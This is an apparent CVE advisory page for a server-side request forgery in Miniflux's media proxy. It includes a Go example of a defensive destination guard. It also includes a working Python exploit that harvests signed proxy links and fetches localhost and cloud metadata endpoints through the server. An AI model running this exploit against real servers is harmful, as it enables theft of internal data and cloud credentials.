Security Vulnerability Report
CVE-2026-21885 CVSS 6.5 MEDIUM

CVE-2026-21885

Published: 2026-01-08 14:15:57
Last Modified: 2026-01-12 16:55:42

Description

Miniflux 2 is an open source feed reader. Prior to version 2.2.16, Miniflux's media proxy endpoint (`GET /proxy/{encodedDigest}/{encodedURL}`) can be abused to perform Server-Side Request Forgery (SSRF). An authenticated user can cause Miniflux to generate a signed proxy URL for attacker-chosen media URLs embedded in feed entry content, including internal addresses (e.g., localhost, private RFC1918 ranges, or link-local metadata endpoints). Requesting the resulting `/proxy/...` URL makes Miniflux fetch and return the internal response. Version 2.2.16 fixes the issue.
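The mechanism in the description, and the check it lacks, as an added illustration in Go (the language Miniflux is written in). This is not code from the Miniflux project or the advisory: the key, the function names, the constructed resolver table and the host names are assumptions made for the example. It mints and verifies a `/proxy/{encodedDigest}/{encodedURL}` path with HMAC-SHA256 over the media URL, shows that a client without the server's key cannot forge one (which is why the attacker has the server mint it through feed entry content), and then adds the destination guard the signature does not provide: resolve the host and refuse loopback, RFC 1918, link-local and similar addresses. It goes slightly beyond the description in also catching IPv4-mapped IPv6 literals and CGNAT space.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"net"
	"net/url"
	"strings"
)

// Stand-in for the server-side key (assumed for this lab; Miniflux reads its own
// key from the MEDIA_PROXY_PRIVATE_KEY setting).
var proxyKey = []byte("lab-only-media-proxy-key")

// signProxyPath mints /proxy/{encodedDigest}/{encodedURL}: HMAC-SHA256 over the raw
// media URL, both parts base64url. It never looks at where the URL points.
func signProxyPath(mediaURL string) string {
	mac := hmac.New(sha256.New, proxyKey)
	mac.Write([]byte(mediaURL))
	return "/proxy/" + base64.URLEncoding.EncodeToString(mac.Sum(nil)) +
		"/" + base64.URLEncoding.EncodeToString([]byte(mediaURL))
}

// verifyProxyPath checks the digest in constant time and returns the media URL.
func verifyProxyPath(path string) (string, error) {
	parts := strings.Split(strings.TrimPrefix(path, "/proxy/"), "/")
	if len(parts) != 2 {
		return "", fmt.Errorf("malformed proxy path %q", path)
	}
	digest, errD := base64.URLEncoding.DecodeString(parts[0])
	rawURL, errU := base64.URLEncoding.DecodeString(parts[1])
	if errD != nil || errU != nil {
		return "", fmt.Errorf("bad base64 in proxy path %q", path)
	}
	mac := hmac.New(sha256.New, proxyKey)
	mac.Write(rawURL)
	if !hmac.Equal(digest, mac.Sum(nil)) {
		return "", fmt.Errorf("bad signature for %s", rawURL)
	}
	return string(rawURL), nil
}

// forgeProxyPath reuses the digest minted for signedFor on claimed, the most a
// keyless client can do; verifyProxyPath rejects it, so the server has to mint the path.
func forgeProxyPath(signedFor, claimed string) string {
	digest := strings.Split(strings.TrimPrefix(signProxyPath(signedFor), "/proxy/"), "/")[0]
	return "/proxy/" + digest + "/" + base64.URLEncoding.EncodeToString([]byte(claimed))
}

// Resolver lets the guard run offline; production code passes net.LookupIP.
type Resolver func(host string) ([]net.IP, error)

// labResolver is a constructed lookup table for this example, not real DNS.
func labResolver(host string) ([]net.IP, error) {
	table := map[string]string{"localhost": "127.0.0.1",
		"metadata.google.internal": "169.254.169.254", "cdn.example.org": "203.0.113.10"}
	if addr, ok := table[host]; ok {
		return []net.IP{net.ParseIP(addr)}, nil
	}
	return nil, fmt.Errorf("no such host: %s", host)
}

var sharedAddressSpace = net.IPNet{IP: net.IPv4(100, 64, 0, 0), Mask: net.CIDRMask(10, 32)}

// isInternalIP refuses loopback, RFC 1918/ULA, link-local (where cloud metadata lives),
// unspecified, multicast and CGNAT; To4() inside the net methods also catches
// IPv4-mapped IPv6 such as ::ffff:127.0.0.1.
func isInternalIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsUnspecified() || ip.IsMulticast() ||
		ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() || sharedAddressSpace.Contains(ip)
}

// checkDestination is the check the signature does not give: restrict the scheme,
// resolve the host and refuse if any returned address is internal.
func checkDestination(rawURL string, resolve Resolver) error {
	u, err := url.Parse(rawURL)
	if err != nil {
		return err
	}
	host := u.Hostname()
	if (u.Scheme != "http" && u.Scheme != "https") || host == "" {
		return fmt.Errorf("unsupported URL %q", rawURL)
	}
	ips := []net.IP{net.ParseIP(host)}
	if ips[0] == nil { // a name, not an address literal: look it up
		if ips, err = resolve(host); err != nil || len(ips) == 0 {
			return fmt.Errorf("cannot resolve %s: %v", host, err)
		}
	}
	for _, ip := range ips {
		if isInternalIP(ip) {
			return fmt.Errorf("%s resolves to internal address %s", host, ip)
		}
	}
	return nil
}

func main() {
	for _, t := range []string{"http://127.0.0.1:8080/", "http://localhost:80/",
		"http://169.254.169.254/latest/meta-data/", "http://[::ffff:10.0.0.5]/",
		"http://metadata.google.internal/computeMetadata/v1/", "http://cdn.example.org/image.png"} {
		got, err := verifyProxyPath(signProxyPath(t))
		fmt.Printf("%-52s signed=%v guard=%v\n", t, err == nil && got == t, checkDestination(t, labResolver))
	}
	_, err := verifyProxyPath(forgeProxyPath("http://cdn.example.org/image.png", "http://127.0.0.1:8080/"))
	fmt.Println("forged path accepted:", err == nil)
}
```

Whether 2.2.16 implements its fix in this shape is not stated on this page; the guard above is the generic form of an SSRF fix, shown so the point of the advisory is clear: the HMAC proves the server minted the URL, it says nothing about where the URL points. Two caveats for anyone adopting such a guard: resolve once and dial the address you checked (a custom DialContext) so a DNS answer that changes between check and fetch cannot bypass it, and re-check or refuse redirects, since a public host can 302 to an internal one.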

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-918 (Server-Side Request Forgery)

Configurations (Affected Products)

cpe:2.3:a:miniflux_project:miniflux:*:*:*:*:*:go:*:* - VULNERABLE
Miniflux >= 2.0.0 and < 2.2.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-21885 Miniflux SSRF PoC
Target: Miniflux < 2.2.16
Type: Server-Side Request Forgery via media proxy endpoint

Miniflux signs /proxy/{encodedDigest}/{encodedURL} with HMAC-SHA256 under a
server-side key (the MEDIA_PROXY_PRIVATE_KEY setting, random by default), so
a client cannot mint a valid proxy URL on its own. As the advisory describes,
the server mints it: subscribe the target account to a feed you control whose
entry content embeds an internal address, for example
    <img src="http://169.254.169.254/latest/meta-data/">
open that entry in the web UI, and the rendered page carries a signed /proxy/
link for it. This script logs in, harvests those links from the entry page
given on the command line, and requests each one so Miniflux fetches the
internal target and relays the response. Use plain http:// media URLs: by
default Miniflux proxies only http image URLs (MEDIA_PROXY_MODE=http-only,
MEDIA_PROXY_RESOURCE_TYPES=image). The key-based builder is kept only for a
lab instance whose key you set yourself.
"""
import base64
import hashlib
import hmac
import re
import sys
import urllib.parse

import requests

# Configuration
TARGET_URL = "http://target-miniflux-server.com"  # Replace with target
USERNAME = "attacker"
PASSWORD = "password"
PROXY_PRIVATE_KEY = b""  # lab only: the instance's MEDIA_PROXY_PRIVATE_KEY, else empty

PROXY_LINK_RE = re.compile(r"/proxy/[A-Za-z0-9_%=-]+/[A-Za-z0-9_%=-]+")
CSRF_RE = re.compile(r'name="csrf"\s+value="([^"]+)"')


def login():
    """Log in through the web form and return the authenticated session."""
    session = requests.Session()
    login_url = f"{TARGET_URL}/login"
    page = session.get(login_url, timeout=10)  # sets the session cookie
    data = {"username": USERNAME, "password": PASSWORD}
    match = CSRF_RE.search(page.text)
    if match:  # the login form carries a csrf token the POST must echo back
        data["csrf"] = match.group(1)
    response = session.post(login_url, data=data, allow_redirects=False, timeout=10)
    if response.status_code not in (301, 302, 303):
        sys.exit(f"[-] Login failed (HTTP {response.status_code})")
    return session


def build_proxy_url(media_url, key):
    """Build a signed proxy URL the way the server does: HMAC-SHA256 over the
    raw URL, digest and URL both base64url-encoded. Needs the server's key."""
    digest = hmac.new(key, media_url.encode(), hashlib.sha256).digest()
    encoded_digest = base64.urlsafe_b64encode(digest).decode()
    encoded_url = base64.urlsafe_b64encode(media_url.encode()).decode()
    return f"{TARGET_URL}/proxy/{encoded_digest}/{encoded_url}"


def collect_proxy_urls(session, entry_page_url):
    """Harvest every server-minted /proxy/ link from a rendered entry page."""
    response = session.get(entry_page_url, timeout=10)
    response.raise_for_status()
    links = sorted(set(PROXY_LINK_RE.findall(response.text)))
    return [urllib.parse.urljoin(TARGET_URL, link) for link in links]


def decode_proxy_target(proxy_url):
    """Recover the media URL behind a /proxy/ link, for display only."""
    encoded_url = urllib.parse.unquote(proxy_url.rsplit("/", 1)[1])
    encoded_url += "=" * (-len(encoded_url) % 4)  # restore stripped padding
    return base64.urlsafe_b64decode(encoded_url).decode(errors="replace")


def exploit_ssrf(session, proxy_url):
    """Request a signed proxy URL; the server fetches the target and relays it."""
    print(f"[*] Target internal URL: {decode_proxy_target(proxy_url)}")
    print(f"[*] Proxy URL: {proxy_url}")
    try:
        response = session.get(proxy_url, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None
    print(f"[*] Status: {response.status_code}")
    print(f"[*] Response length: {len(response.content)} bytes")
    if response.status_code == 200:
        print("[+] Success! Response preview:")
        print(response.text[:500])
    return response


def main():
    print("=" * 60)
    print("CVE-2026-21885 Miniflux SSRF Exploitation")
    print("=" * 60)
    session = login()
    if PROXY_PRIVATE_KEY:
        # Lab shortcut: mint the signed URLs ourselves with the known key.
        internal_targets = [
            "http://127.0.0.1:8080/",                               # Localhost
            "http://localhost:80/",                                 # Local HTTP
            "http://169.254.169.254/latest/meta-data/",             # AWS metadata
            "http://metadata.google.internal/computeMetadata/v1/",  # GCP metadata
        ]
        proxy_urls = [build_proxy_url(t, PROXY_PRIVATE_KEY) for t in internal_targets]
    else:
        if len(sys.argv) != 2:
            sys.exit(f"usage: {sys.argv[0]} <entry-page-url-of-your-planted-feed>")
        proxy_urls = collect_proxy_urls(session, sys.argv[1])
        if not proxy_urls:
            sys.exit("[-] No /proxy/ links on that page; is the media URL plain http?")
    for proxy_url in proxy_urls:
        print(f"\n[*] Testing: {proxy_url}")
        exploit_ssrf(session, proxy_url)


if __name__ == "__main__":
    main()
```

References

https://github.com/miniflux/v2/security/advisories/GHSA-xwh2-742g-w3wp (Exploit, Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-21885",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T14:15:57.257",
    "lastModified": "2026-01-12T16:55:42.353",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Miniflux 2 is an open source feed reader. Prior to version 2.2.16, Miniflux's media proxy endpoint (`GET /proxy/{encodedDigest}/{encodedURL}`) can be abused to perform Server-Side Request Forgery (SSRF). An authenticated user can cause Miniflux to generate a signed proxy URL for attacker-chosen media URLs embedded in feed entry content, including internal addresses (e.g., localhost, private RFC1918 ranges, or link-local metadata endpoints). Requesting the resulting `/proxy/...` URL makes Miniflux fetch and return the internal response. Version 2.2.16 fixes the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-918"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:miniflux_project:miniflux:*:*:*:*:*:go:*:*",
                "versionStartIncluding": "2.0.0",
                "versionEndExcluding": "2.2.16",
                "matchCriteriaId": "145FED28-3379-45DD-B388-01F5ADF6A766"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/miniflux/v2/security/advisories/GHSA-xwh2-742g-w3wp",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/miniflux/v2/security/advisories/GHSA-xwh2-742g-w3wp",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```